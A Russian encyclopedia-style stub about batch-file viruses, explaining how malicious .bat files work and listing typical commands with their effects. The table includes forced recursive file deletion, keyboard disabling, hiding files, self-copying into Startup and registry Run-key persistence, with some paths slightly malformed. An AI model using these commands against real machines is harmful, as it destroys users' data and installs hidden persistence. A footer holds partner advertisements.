Шаблон:К улучшению
Пакетный вирус — вид вредоносной программы, написанной в виде пакетного файла.
Данный тип вируса опасен тем, что его легко создать даже тем кто не владеет полноценным программированием, команды для пакетных файлов достаточно простые, их можно найти в открытом доступе а создать такой файл можно в системном приложении «Блокнот». Также его не всегда определяют антивирусные программы.
Принцип работы
Пакетный вирус — это последовательность команд (которая может причинить вред владельцу компьютера), для командного интерпретатора операционной системы, выполненная в виде пакетного файла. Пакетный файл представляет собой обычный текстовый файл, но, в отличие от последнего, имеет расширение .bat
, .cmd
, или .btm
. Пакетные файлы используются для автоматизации различный действий, например, в процессе установки программ или другой рутинной работы.
Распознание
Антивирусные программы не всегда определяют пакетные вирусы как вредоносные программы, лишь иногда их идентифицируя как «трояны» или программы-шутки.
Команды вируса
Обычно первая команда в таком файле: @echo off она полностью безвредна, но отключает режим вывода команд из пакетного файла на экран, чтобы человек не увидел те команды которые будут выполняются
Примеры некоторых команд, характерных для пакетного вируса:
Команда |
Значение
|
del %0 |
Самоудаление вируса
|
/q |
Маркер выполнения команды без разрешения пользователя
|
attrib +h D:*.* |
Установить атрибут «Скрытый» на файлы, находящиеся в D:
|
rundll32 keyboard, disable |
Отключить клавиатуру
|
del R:\*.*** /f /s /q |
Автоматическое удаление всех файлов с расширением из трех знаков на диске R без запроса на удаление
|
date 29.07.36 |
Сменить дату на 29.07.2036
|
rundll32 user,SwapMouseButton
|
Смена кнопок мыши местами
|
del /s /q *.png |
Удаляет все фотографии (Только .png)
|
md 1
|
Создаст папку на диске под названием 1
|
copy %0 C:\1.bat
|
Копирует вирус в C:\ и переименовывает его на 1.bat
|
copy %0 C:\Users\%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
|
Добавляет файл virus.bat в автозагрузку OC
|
attrib +h %0
|
Скрывает себя
|
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "virus" /t REG_SZ /d "Местоположение virus.bat" /f
|
Добавляет virus.bat в реестр
|
:return
echo TEST
goto return
|
Выполняет бесконечность раз команду "echo TEST"
|
Шаблон:Computer-Security-sci-stub
Шаблон:Нет источников
Шаблон:Вредоносное программное обеспечение
См. также
Партнерские ресурсы |
---|
Криптовалюты |
|
---|
Магазины |
|
---|
Хостинг |
|
---|
Разное |
- Викиум - Онлайн-тренажер для мозга
- Like Центр - Центр поддержки и развития предпринимательства.
- Gamersbay - лучший магазин по бустингу для World of Warcraft.
- Ноотропы OmniMind N°1 - Усиливает мозговую активность. Повышает мотивацию. Улучшает память.
- Санкт-Петербургская школа телевидения - это федеральная сеть образовательных центров, которая имеет филиалы в 37 городах России.
- Lingualeo.com — интерактивный онлайн-сервис для изучения и практики английского языка в увлекательной игровой форме.
- Junyschool (Джунискул) – международная школа программирования и дизайна для детей и подростков от 5 до 17 лет, где ученики осваивают компьютерную грамотность, развивают алгоритмическое и креативное мышление, изучают основы программирования и компьютерной графики, создают собственные проекты: игры, сайты, программы, приложения, анимации, 3D-модели, монтируют видео.
- Умназия - Интерактивные онлайн-курсы и тренажеры для развития мышления детей 6-13 лет
- SkillBox - это один из лидеров российского рынка онлайн-образования. Среди партнеров Skillbox ведущий разработчик сервисного дизайна AIC, медиа-компания Yoola, первое и самое крупное русскоязычное аналитическое агентство Tagline, онлайн-школа дизайна и иллюстрации Bang! Bang! Education, оператор PR-рынка PACO, студия рисования Draw&Go, агентство performance-маркетинга Ingate, scrum-студия Sibirix, имидж-лаборатория Персона.
- «Нетология» — это университет по подготовке и дополнительному обучению специалистов в области интернет-маркетинга, управления проектами и продуктами, дизайна, Data Science и разработки. В рамках Нетологии студенты получают ценные теоретические знания от лучших экспертов Рунета, выполняют практические задания на отработку полученных навыков, общаются с экспертами и единомышленниками. Познакомиться со всеми продуктами подробнее можно на сайте https://netology.ru, линейка курсов и профессий постоянно обновляется.
- StudyBay Brazil – это онлайн биржа для португалоговорящих студентов и авторов! Студент получает уникальную работу любого уровня сложности и больше свободного времени, в то время как у автора появляется дополнительный заработок и бесценный опыт.
- Автор24 — самая большая в России площадка по написанию учебных работ: контрольные и курсовые работы, дипломы, рефераты, решение задач, отчеты по практике, а так же любой другой вид работы. Сервис сотрудничает с более 70 000 авторов. Более 1 000 000 работ уже выполнено.
- StudyBay – это онлайн биржа для англоязычных студентов и авторов! Студент получает уникальную работу любого уровня сложности и больше свободного времени, в то время как у автора появляется дополнительный заработок и бесценный опыт.
|
---|